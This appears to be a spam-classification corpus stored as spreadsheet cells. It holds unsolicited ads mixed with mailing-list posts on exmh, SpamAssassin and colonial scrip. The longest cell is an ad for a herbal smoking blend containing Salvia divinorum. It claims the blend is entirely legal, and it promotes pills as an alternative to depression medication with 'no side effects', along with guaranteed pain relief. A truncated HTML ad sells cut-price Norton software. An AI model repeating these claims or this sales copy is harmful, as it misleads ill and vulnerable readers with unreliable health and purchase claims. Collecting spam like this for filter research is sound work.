 Temple 3 Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-Sensitive/Responsive, pipe-smoking/stoking substance and is undoubtedly the most prestigious, legal offering of its sort on the planet!!!  
 So smokin/stokin potent is this cutting edge formulation, that we have even been able to establish a very happy clientele market base within the hard-core stoner arena and have made positive, happy, smoking differences in many, many lives.
 ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!!
 A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon sensitive/responsive herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple 3 Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the happiness coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  
 Ingredients:
 Temple smoking substances and Temple 3 Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES House Smoking Substance Specialties.  Temple 3 Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple 3 Ragga Dagga (TM) is a proprietary, prescribed botanical amalgamation which includes the following synergistically/synesthesia conglomerated, core-refined, ratio-enhanced herbas/botanicals, resins, essences, flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1, to 100 to 1 viripotent concentrations Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Hybrid Flowering Turnera Diffusa, Capillaris Herba, Angelica Root, Wild Dagga mature leaf matter, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian stems, Calea Zacalechichi buddings, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshu!
 ra cuttings. 
 Please Note:  Temple 3 Ragga Dagga (TM) is an absolutely legal, herba/botanical, Personal Choice, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple 3 Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple 3 Ragga Dagga (TM).  And although we are not age-governed by law.Temple 3 Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple 3 Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their time.  As well, Temple 3 Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicians care in any regard.
 ========================================================
 Here is what our customers are saying about the Temple 3 Ragga Dagga (TM) phenomenon:
 To whom it may concern,
 I was skeptical when I first read your ad.  I grew up in the 70s &amp; 80s.  I was a hard core (alternative smoker) then.  So I knew my stuff.  But drug tests stopped that!  Now I am disabled from a degenerative muscle, ligament, and tendon disease.  I was smoking (an illegal product) for the pain and nausea.  Now I have something just as good; Temple 3, but cheaper, and it is legal!  I also have a lot of trouble sleeping, but the Capillaris Herba made into tea works and smells great!  Your products that I tried so far, are as good or better than your ads say!  That is hard to find nowadays in a company.  Who ever put this stuff together is a botanical genius.  I will be a customer for life!  Also, I talked with a lady on the phone when I was ordering, and asked her to find out if I could get my products and samples to hand out for free.  And just send the customers to you.  Or get a discount on products that I could sell retail to people.  I would prefer the earlier one becau!
 se, I can just talk about your products, I am a great salesman (about 10 years experience), I could hand out flyers, give out little 1 gram pieces as samplers with your business card enclosed, etc.. I am going to be unable to work a regular job for a while, maybe indefinitely?  This deal would give me my own products and samples for free?  You would get free advertising, word of mouth, samples into peoples hands to try, someone that is very good with computers, someone who studied about mail order, Internet, cold calling, small business, good with people, etc..  I would like to be doing something, even if I would get on Social Security Disability.  It is very disheartening not being able to work to support my 2 teenage boys, or do a lot of the things I used to do!  At least I would be able to do something worthwhile.  And great products makes it real easy to sell.  Let me know what you think?
 Sincerely,
 RJ
 Location: Midwest, U.S.A.
 Thank you so much for the Ragga.  It is everything you guys claim, and then some!  I was a bit skeptical when I read your description of its effects, but there is literally no exaggeration in your advertisements.  How nice that this is non-prohibited!  It tastes great and feels great too!  I am so glad I took a chance and ordered.  Blessings to all of you.
 -- Frankie R.
 Location: West Coast, USA
 Im a man of my 40s and I really know my stuff.  I dont drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple 3.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!  
 -- A.J.
 Location: United Kingdom
 ========================================================
 Finally, we realize of course that this Temple 3 Ragga Dagga (TM) is not inexpensive. (Temple 3 Ragga Dagga (TM) is a very, very Sweet Smoke and sweetness is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craft.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple 3 Ragga Dagga (TM). Four or five draws of your pipe.as is the magical way.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple 3 Ragga Dagga (TM) Package.)
 Seventh Heaven Temple 3 Ragga Dagga (TM) is offered exclusively in 56 gram (2 oz.) and 22 gram (.75 oz.) jiggets/bars for $115.00 and $65.00 respectively.  Sorry, no volume discounts.  Wholesale pricing is available to qualified, select merchants only.
 ************************************************************
 Our other fine herbal, botanical products include the following:
 1.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
 2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 
 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...
 4.  Extreme Martial Arts Botanical Remedies; Equivalence Tablets &amp; Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers...
 *********************************************
 Sweet Vjestika Aphrodisia Drops (tm) inspires and enhances:
 * Extreme body sensitivity
 * Sensitivity to touch
 * Desire to touch and be touched
 * Fantasy, lust, rapture, erogenous sensitivity ... 
 * Prolongs and intensifies foreplay, orgasm &amp; climax
 *********************************************
 "Seventh Heaven" Prosaka Tablets ... 
 Entirely natural, proprietary, botanical prescription comprised of uncommon Asian Herbs for Calm, Balance, Serenity and Joyful Living. "Seventh Heaven" Prosaka is indeed a most extraordinary, viripotent, calming, centering, mood-enhancing, holistically-formulated, exotic herbaceous alternative to pharmaceutical medications for depression, anxiety, stress, insomnia, etc.
 NO side effects!  NO dependency!  Vivaciously Mellow!
 **********************************************
 "Seventh Heaven" Gentle Ferocity Tablets (tm) ... 
 a non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; viripotent, herbaceous prescription for the dynamic energization of body, mind and spirit.  
 This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to prolificate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition.  These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective.  Enjoy!
 For those of you who seek to achieve most demonstrative/non-invasive/non-prohibitive appetite suppression without the negative implications of ongoing usage of MaHuang Herb, Ephedra/Ephedrine or Caffeine as are so magnaminously utilized in a multitude of herbal "diet aids" entitled as "Thermogenics" ... this is ABSOLUTELY the herbal agenda/product for you!!
 Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite!
 ***********************************************
 Extreme Martial Arts Botanical Remedies
 Eastern culture has long had a treatment for bone, muscle, tendon, ligament, sinew and joint distress, traumas, afflictions and constrictions.  We are pleased to offer 
   Equivalence Tablets  &amp;  Dragon Wing Remedy Spray
     (Hei Ping Shun)           (Hei Long Chibang)
 PLEASE NOTE:
 While it is true that all physiological traumas and injuries are unique and that no product can arbitrarily eliminate all of the pain and discomfort in all people all of the time, the combination of Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy (Hei Long Chibang) remedial botanicals does guarantee to at the least:
 1.  Significantly reduce discomfort and pain!
 (In many instances most, if not all, traumas and distress can be eliminated!)
 2.  Significantly increase mobility and strength ratio.
 (Please remember also the significance of proper diet, excercise, rest and prayer.)
 Equivalence Tablets &amp; Dragon Wing Spray Remedials are comprised of entirely natural botanical factors.
 While Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy Spray (Hei Long Chibang) are extremely effective individually, they are utilized to maximum advantage when used in conjunction with one another.
 ========================================================
 !!!!Please refer to Introductory Offers further on in this text featuring Temple 3 Ragga Dagga (TM) along with our other very fine Sensitive/Responsive cordial botanical products. Please enjoy!!!  Many Blessings to you all.
 ========================================================
 PRICING INFORMATION:
 1.    SEVENTH HEAVEN Seventh Heaven Temple 3 (tm)
 One     .75 oz. jigget/bar          $65.00
 One    2.0 oz. jigget/bar          $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text)
 2.    SWEET VJESTIKA APHRODISIA DROPS (tm)
 One	1.0 oz. bottle		$90.00   
 Two	1.0 oz. bottles	       $140.00  
 3.    SEVENTH HEAVEN PROSAKA (tm)
 One    100 tablet tin          $40.00
 Three  100 tablet tins        $105.00
 Six    100 tablet tins        $185.00
 4.    SEVENTH HEAVEN GENTLE FEROCITY (tm)
 One   300 tablet jar          $130.00
 5.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
 **  3-pack  (270 tablets)    $83.00
 **  6-pack  (540 tablets)    $126.00 (save $40.00)
 **  9-pack  (810 tablets)    $159.00 (save $90.00)
 **  12-pack (1,080 tablets)  $192.00 (save $140.00)
 6.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
 **  3-pack  (3 - 4 oz. bottles)     $83.00
 **  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
 **  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
 **  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)
 7.    Dynamic Duo Introductory Offers 
 **  3-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $126.00 (save $40.00)
 **  6-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $159.00 (save $50.00)
 **  9-pack Equivalence Tabs &amp; 6-pack Dragon Wing   $215.00 (save $70.00)
 **  12-pack Equivalence Tabs &amp; 9-pack Dragon Wing  $271.00 (save $80.00)
 8.   SWEET APHRODISIA INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.  For $150.00 (Reg. $205.00  Save $55)  (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 9.   BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka.  For $125.00 (Reg. $155.00  Save $30) (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 10.  "PURE ENERGY" INTRO COMBINATION OFFER 
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity.  For $170.00 (Reg. $245.00  Save $75)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text)
 11.  "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00  Save $85)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 12.  ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFER
 Includes one - 2.0 oz. jigget / bar of Seventh Heaven Temple 3, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00  Save $115)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 SPECIAL OFFER:  For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you.  This hookah has a retail value of $25.00. 
 **************************************************
 ORDERING INFORMATION:
 For your convenience, you can call us direct with your orders or questions.
 Call 1-623-974-2295 
 Monday - Friday -- 10:30 AM to 7:00 PM (Mountain Time)
 Saturday -- 11:00 AM to 3:00 PM (Mountain Time)
 For all domestic orders, add $5.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.
 **************************************************
 SPECIAL DISCOUNT &amp; GIFT
 Call now and receive a FREE botanical gift!  With every order for a 2.0 oz. jigget / bar of Seventh Heaven Temple 3 or one of our four (4) Intro Combination Offers, we will include as our free gift to you ... a 2.0 oz. package of our ever so sedate, sensitive Asian import, loose-leaf Capillaris Herba for "happy" smoking or brewing ... (a $65.00 retail value).
 ====================================================
 To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: your registration
</t>
  </si>
  <si>
    <t xml:space="preserve">PUBLIC ANNOUNCEMENT:
 The new .NAME domain extension is currently being released to the general public. Unlike the original .COM and .NET domain names, the new .NAME domain was specifically created for individuals such as yourself. The .NAME domain appears in the format: FirstName.LastName.NAME For example, if your name is Monica Smith, then you can register a name such as monica.smith.name Technology experts predict that personalized domain names will soon be used as international identifiers much the same was that phone numbers are used today. For a limited time, you can pre-register your unique .NAME domain for only $10 (plus applicable registry fees) at: http://www.namesforeveryone.com 
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 21
 9488ycte7-565FWHF6137iGcL4-997l28
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;Hal DeVore said:
  &gt;     "Brent said in his book"
  &gt;     This Paste function can be convenient, but it turns out that
  &gt;     users still need to keep track of the difference between the
  &gt;     two selections.  If a user only understands the CLIPBOARD,
  &gt;     then the user of PRIMARY is only surprising.  I learned that
  &gt;     it is best to have a separate paste user action for the two
  &gt;     selections.  The convention is that &lt;ButtonRelease-2&gt; sets
  &gt;     the insert point and inserts the PRIMARY selection. ... The
  &gt;     &lt;&lt;Paste&gt;&gt; event (e.g., the Paste key) simply inserts the
  &gt;     CLIPBOARD selection at the current insert point. ...
 Yeah, I learned by hearing exmh users scream in agony.  Sorry about
 all that.  We should be able to clean this up.  If you grep for
 "bind" in seditBind you quickly find the Text_Selection proc
 I described in the previous email.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</si>
  <si>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Re: [SAtalk] Spam through - insanefunnies - clairification of X-Spam-Status fi elds?
</t>
  </si>
  <si>
    <t xml:space="preserve">Amis-v or there is another prefs file that SA is using. I had a heck of a time
 figuring out where to find my site wide file because of my configuration.
 If your using spamd and you want your users to have some control using
 user_prefs then check their ~/spamassassin file.
 If your using spamd and you have a site wide only policy then make sure that
 spamd is started with the -x option.
 If you used the -x option then the only place that it should get the rules from
 would be from the local.cf in the /etc/mail/spamassassin directory. Assuming a
 default install.
 Theo Van Dinter wrote:
 &gt; 
 &gt; On Wed, Jul 24, 2002 at 10:18:28AM -0500, Stewart, John wrote:
 &gt; &gt; X-Virus-Scanned: by amavisd-new amavisd-new-20020630
 &gt; &gt; X-Spam-Status: No, hits=6.5 tagged_above=5.1 required=6.9 tests=PLING,
 &gt; &gt; MONEY_BACK, CLICK_BELOW, POR
 &gt; &gt; N_14, CLICK_HERE_LINK, FREQ_SPAM_PHRASE
 &gt; &gt; X-Razor-id: d92173a8dfc60567e55efcf6bf264fd7f7a7369a
 &gt; &gt;
 &gt; &gt; Doesn't hits=6.5 mean that it should be tagged as spam? Why the
 &gt; &gt; X-Spam-Status of no then?
 &gt; 
 &gt; required is 6.9, it only scored 6.5, so it's not spam according to SA.
 &gt; 
 &gt; &gt; Why is required=6.9 if I have required_hits at 5 in the local.cf? Where the
 &gt; &gt; heck does that number come from?
 &gt; &gt;
 &gt; &gt; Also, what is tagged_above=? I cannot find any information about it on the
 &gt; &gt; SpamAssassin site.
 &gt; 
 &gt; Good questions...  "tagged_above" doesn't appear anywhere in SA (at
 &gt; least according to `find`).  I would guess it's amavis doing some
 &gt; hacking around.
 &gt; 
 &gt; --
 &gt; Randomly Generated Tagline:
 &gt; D'oh!  English!  Who needs that?  I'm never going to England. Come on,
 &gt;  let's smoke.
 &gt; 
 &gt;                 -- Homer Simpson, talking Barney into cutting class
 &gt;                    The Way We Was
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Spamassassin-talk mailing list
 &gt; Spamassassin-talk@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
 -- 
 ========================
 Kevin W. Gagel
 Network Administrator
 College of New Caledonia
 gagel@cnc.bc.ca
 postmaster@cnc.bc.ca
 (250)562-2131 loc. 448
 ========================
 --------------------------------
 The College of New Caledonia    
 Visit us at http://www.cnc.bc.ca
 --------------------------------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</si>
  <si>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Colonial Script ...
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, they were plenty upset about the tea taxes.
 But the crack down on colonial script certainly screwed over the
 American Colonies.  And, BTW, England as well.
 Dear Ben Franklin was right for the wrong reasons.  First of all the
 colonies were not prosperous compared to England proper.  Second, the
 issuance of colonial script had nothing to do with full employeement.
 (In fact, it is almost inconceivable he would make that claim.  It
 sounds like a modern Keynsian was creating an urban legend.)
 OTOH the lack of sufficient circulating monetary instruments was
 economically crippling.  Imagine trying to buy your supplies by offering
 IOUs on your own name -- and then trying to market / exchange the paper
 as the merchant who took the IOU.
 ===========================
 The most common problem in the world is when a government prints too
 much money.  The effects are a complete disaster.  There are a lot of
 incentives that push governments into doing this even though it is
 incredibly stupid.
 So almost all the literature talks about that.
 But you can ALSO screw an economy over by taking all the money out of
 circulation.  The fundamental cause of the American Great Depression was
 exactly this, courtesy of the Federal Reserve Board.
 I don't think shifting the power to print money to the bank of Canada
 had much effect.  And Canada is still a prosperous country.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Gary
 &gt; Lawrence Murphy
 &gt; Sent: Saturday, September 21, 2002 7:31 AM
 &gt; To: Mr. FoRK
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: Re: sed /s/United States/Roman Empire/g
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; "f" == fork list &lt;Mr.&gt; writes:
 &gt; 
 &gt;     f&gt; "Free trade and free markets have proven their ability to lift
 &gt;     f&gt; whole societies out of poverty" I'm not a
 &gt;     f&gt; socio-political/history buff - does anybody have some clear
 &gt;     f&gt; examples?
 &gt; 
 &gt; China?  Ooops, no wait, scratch that.
 &gt; 
 &gt; There is one counter example that I can think of, but it may not be
 &gt; precisely "free trade/markets" -- when Ben Franklin first visited
 &gt; England he was asked why the colonies were so prosperous.  Ben
 &gt; explained that they used "Colonial Script", a kind of barter-dollar,
 &gt; and increasing the supply of script ensured complete employment.  The
 &gt; British bankers were furious and immediately lobbied parliament to
 &gt; clamp down on the practice.  Within a few years, the colonies were
 &gt; rife with unemployment and poverty just like the rest of the Empire.
 &gt; 
 &gt; According to questionable literature handed out by a fringe political
 &gt; party here in Canada, the Founding Fathers had no real complaint about
 &gt; tea taxes, it was the banning of colonial script they were
 &gt; protesting. If this is true, then it comes right back to the forces
 &gt; that killed Ned Ludd's followers as to why popular opinion believes
 &gt; they were protesting a tea tax.  The same pamphlet claimed that Canada
 &gt; was also a prosperous nation until, by an act of parliament in the
 &gt; late-50's or early 60's, the right to print money was removed from the
 &gt; juristiction of parliament and handed over to the Bank of Canada.
 &gt; 
 &gt; I've wondered about all this.  Certainly the timeline of the collapse
 &gt; of the Canadian economy fits the profile, but there are oodles of
 &gt; other causes (for example, spending money like we had 300M people when
 &gt; we only had 20M) Anyone have any further information on this?
 &gt; 
 &gt; --
 &gt; Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 &gt;  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
 &gt;   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] By the way
</t>
  </si>
  <si>
    <t xml:space="preserve">What the hell is it with these mini remote control cars? Not only has 
 my mailbox been full of spam advertising them, but there's a fairly 
 large stall selling them at Paddington station.
 -- 
   Joe McNally :: Flaneur at Large :: http://www.flaneur.org.uk
 --
 "What's orange and looks good on hippies? Fire." - Steve Albini
 --
 Currently playing: nothing.
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-13
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * The Perl Journal Returns Online
 +--------------------------------------------------------------------+
 | The Perl Journal Returns Online                                    |
 |   posted by pudge on Wednesday September 11, @21:59 (links)        |
 |   http://use.perl.org/article.pl?sid=02/09/12/026254               |
 +--------------------------------------------------------------------+
 CMP, owners of [0]The Perl Journal, have brought the journal back, in the
 form of an online monthly magazine, in PDF form. The subscription rate is
 $12 a year. They need 3,000 subscriptions to move forward (no word if
 existing subscriptions will be honored, or included in the 3,000).
 [0]Read the site for more details.
 I think some of the more interesting notes are that it will include "a
 healthy dose of opinion", as well a broadening of coverage including
 languages other than Perl (will this mean a name change?) and platforms
 other than Unix (I'd always thought one of TPJ's strengths was that it
 covered a wide variety of platforms).
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/12/026254
 Links:
     0. http://www.tpj.com/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</si>
  <si>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Attn: PROTECT YOUR COMPUTER,YOU NEED SYSTEMWORKS2002!            19806
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"3" cellspacing=3D"3" width=3D"469" cellpadding=3D"3" bgco=
 lor=3D"#000080"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"447"&gt;&amp;nbsp;
       &lt;table border=3D"1" width=3D"100%" bgcolor=3D"#FFFFFF" bordercolor=3D=
 "#000080"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" align=3D"center"&gt;&lt;font face=3D"Impact" size=3D=
 "4" color=3D"#CC0000"&gt;ATTENTION:
             This is a MUST for &lt;u&gt;ALL&lt;/u&gt; Computer Users!!!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"3" face=3D"Verdana"&gt;&lt;b&gt;&amp;nbsp;&lt;font=
  color=3D"#FFFFFF"&gt;*NEW
       - Special Package Deal!*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;table border=3D"8" width=3D"100%" height=3D"86" bgcolor=3D"#FFFFFF"=
  bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;font face=3D"=
 Verdana, Arial, Helvetica, sans-serif" color=3D"#000099" size=3D"5"&gt;&lt;b&gt;Nor=
 ton
             SystemWorks 2002 Software Suite&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F00"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; =
 - Feature-Packed Utilities&lt;br&gt;ALL
             for &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF00"&gt;=
 1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 00"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"115" bgcolor=3D"#000080=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"109"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D=
 "2" color=3D"#FFFF00"&gt;This Software Will:&lt;/font&gt;&lt;font face=3D"Tahoma" size=
 =3D"2" color=3D"#FFFFFF"&gt;&lt;br&gt;- Protect your
             computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt; viruses&lt;br&gt;- Help=
  secure your
             private &amp;amp; valuable information&lt;br&gt;- Allow you to transfer =
 files
             and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;- Backup your ALL your data=
  quick and
             easily&lt;br&gt;- Improve your PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;&lt;font=
  color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;Feature-Packed Utilities&lt;br&gt;&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt;
             &lt;/font&gt;&lt;u&gt;&lt;font color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;/u&gt;&lt;u&gt;&lt;font color=3D=
 "#000000"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000080"&gt; Great
             Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000"&gt; &lt;br&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;
             A&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font color=3D"#ff0000"&gt;$300+=
 &lt;/font&gt;  &lt;/font&gt;&lt;font color=3D"#000080"&gt; Combined Retail Value
             &lt;i&gt;YOURS&lt;/i&gt; for Only&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font col=
 or=3D"#ff0000"&gt;$29.99!&lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;&lt;font color=3D=
 "#000080"&gt;&amp;lt;Includes
             &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font color=3D"#0000=
 80"&gt; Shipping!&amp;gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial, Helvetica, sans-serif"  c=
 olor=3D"#ffffff"&gt;Don't fall prey to destructive viruses
     or hackers!&lt;br&gt;Protect&amp;nbsp; your computer and your valuable  informat=
 ion
     and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"1" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 FFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#0000FF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"4" color=3D"#FFFFFF"&gt;
           &lt;a style=3D"color: #FFFFFF; font-family: Verdana; font-size: 14p=
 t; font-weight: bold" href=3D"http://www.deal2002.com/platinum/platinumsys=
 temworks.htm"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"5"&gt;
       &lt;a style=3D"text-decoration: none; background-color: rgb(255,255,0);=
  color: #0000FF" href=3D"http://www.deal2002.com/platinum/platinumsystemwo=
 rks.htm"&gt;Click
       here for more information&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#fffff=
